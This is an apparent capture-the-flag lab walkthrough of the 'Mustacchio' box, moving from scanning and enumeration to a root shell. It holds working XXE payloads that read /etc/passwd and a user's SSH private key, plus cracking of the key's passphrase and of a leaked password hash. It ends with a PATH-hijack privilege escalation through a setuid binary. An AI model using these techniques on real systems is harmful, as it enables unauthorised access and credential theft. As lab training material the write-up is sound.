1. Scanning & Enumeration
We do the below scans in parallel.
1.1. Port Scanning
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
| 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Info Gathered:
- SSH open on 22
- Post 80 with a website open
More information gathered later, as the full port scan takes a lot longer.
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-http
We could explore the last port later.
1.2. Web Enumeration
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'php,html,txt' -t 32 -q -u 10.10.247.224
/images (Status: 301) [Size: 315] [--> http://10.10.247.224/images/]
/about.html (Status: 200) [Size: 3152]
/contact.html (Status: 200) [Size: 1450]
/index.html (Status: 200) [Size: 1752]
/blog.html (Status: 200) [Size: 3172]
/gallery.html (Status: 200) [Size: 1950]
/custom (Status: 301) [Size: 315] [--> http://10.10.247.224/custom/]
/robots.txt (Status: 200) [Size: 28]
/fonts (Status: 301) [Size: 314] [--> http://10.10.247.224/fonts/]
/server-status (Status: 403) [Size: 278]
Info gathered:
- custom looks interesting
- robots.txt usually contains intersting information
1.3. Web Exploration
The homepage.
We explore the /custom/
page, and get another /js/
directory onwards.
I first looked in users.bak
. We get something interesting!
┌──(kali㉿kali)-[/tmp]
└─$ cat users.bak
��r�CtableusersusersCREATE TABLE "users" (
"id" INTEGER,
"username" TEXT,
"password" TEXT,
"role" INTEGER
��2 ]admin{hash_was_here_and_i_hid_it_lol}
1.4. Hash Cracking
Looks like a hash for the username admin
. But, of what kind?
┌──(kali㉿kali)-[/tmp]
└─$ hashid {hash_was_here_and_i_hid_this_too}
Analyzing '{yeee_hawww}'
[+] SHA-1
[+] Double SHA-1
[+] RIPEMD-160
[+] Haval-160
[+] Tiger-160
[+] HAS-160
[+] LinkedIn
[+] Skein-256(160)
[+] Skein-512(160)
Using john the ripper, we get the password XD
┌──(kali㉿kali)-[/tmp]
└─$ ssh admin@10.10.247.224
The authenticity of host '10.10.247.224 (10.10.247.224)' can't be established.
ECDSA key fingerprint is SHA256:g//RSEsVCZF6FIydF0R24Gmek8fI6D7kRnDXF3fNK9Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.247.224' (ECDSA) to the list of known hosts.
admin@10.10.247.224: Permission denied (publickey).
And … we see that we are not allowed :( At this point, we have one last option left.
1.5. The Mystery Port & Our Key to Success
Exploring the last port, we get some more information.
PORT STATE SERVICE VERSION
8765/tcp open http nginx 1.10.3 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let’s go!
We see an admin panel! Recall, we already have the credentials :D
We see the following in the source code. <!-- Barry, you can now SSH in using your key!-->
Now what?
1.6. XML
I opened up burp-suite, and I got the following.
POST /home.php HTTP/1.1
Host: 10.10.247.224:8765
...
Connection: close
xml=wow
We have a comment box that looks like a place to enter XML text, as we see in the POST request.
Let’s try:
<?xml version="1.0" encoding="UTF-8"?>
<root>
<author>hacc</author>
<name>Hackerman</name>
</root>
Ey, Voila!
I looked around, and I got OWASP XXE.
Now, we can craft a special tasty XXE attack.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE author [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root><author>&read;</author></root>
Explaination:
- The first line is prolog
- The second line specifies something of
author
, containing the information of the system file/etc/passwd
in a variable calledread
. - When we ask to display the author, we can put the
&read;
in between the tags. This then prints the desired output.
1.7. SSH Keys
Using the above listing, we find two users, joe
and barry
. We see the hint given to us in the source code, to login SSH using Barry as username.
We can modify the request as such:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE author [<!ENTITY read SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<root>
<author>&read;</author>
</root>
And we can get the private key! Use chmod 600 id_rsa
to assign appropriate permissions.
2. Foothold
Trying the key, we see that we need a passphrase. We can use ssh2john
for this.
┌──(kali㉿kali)-[/tmp]
└─$ locate ssh2john
/usr/share/john/ssh2john.py
┌──(kali㉿kali)-[/tmp]
└─$ /usr/share/john/ssh2john.py id_rsa > hash
┌──(kali㉿kali)-[/tmp]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 6 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
{passphrase} (id_rsa)
1g 0:00:00:03 DONE (2021-06-12 10:53) 0.2754g/s 3950Kp/s 3950Kc/s 3950KC/s 1990..*7¡Vamos!
Session completed
Let’s login!
┌──(kali㉿kali)-[/tmp]
└─$ ssh -i id_rsa barry@10.10.237.166
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
13 packages can be updated.
10 of these updates are security updates.
To see these additional updates run: apt list --upgradable
Last login: Sat Jun 12 13:20:56 2021 from 10.17.8.184
barry@mustacchio:~$
3. PrivEsc
Okay now what? Sudo we can’t touch. Crontab empty. Linux kernel tip top. SUID?
barry@mustacchio:~$ find / -type f -perm -u=s 2> /dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log
/bin/ping
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su
Okay. So, home/joe/live_log
shows us the following.
barry@mustacchio:~$ file /home/joe/live_log
/home/joe/live_log: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6c03a68094c63347aeb02281a45518964ad12abe, for GNU/Linux 3.2.0, not stripped
Okay, let’s execute.
barry@mustacchio:~$ /home/joe/live_log
10.17.8.184 - - [12/Jun/2021:09:09:41 +0000] "POST /home.php HTTP/1.1" 200 1123 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
10.17.8.184 - - [12/Jun/2021:09:09:47 +0000] "POST /home.php HTTP/1.1" 200 1123 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
...
^CLive Nginx Log
It says it is Live Nginx Log
. We clearly need more information. What about the strings in the executable?
...
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
...
crtstuff.c
...
demo.c
...
Looks closely! We have tail
present. This is now a simle PATH
epxloit. 2 Simple steps.
- We add the current path in the
PATH
environment variable. - We create an executable called
tail
Step 1:
barry@mustacchio:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ export PATH=$PWD:$PATH
barry@mustacchio:~$ echo $PATH
/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Step 2:
barry@mustacchio:~$ cat tail
#!/usr/bin/python3
import pty
pty.spawn("/bin/bash")
barry@mustacchio:~$ chmod +x tail
barry@mustacchio:~$ /home/joe/live_log
root@mustacchio:~#
System Compromised!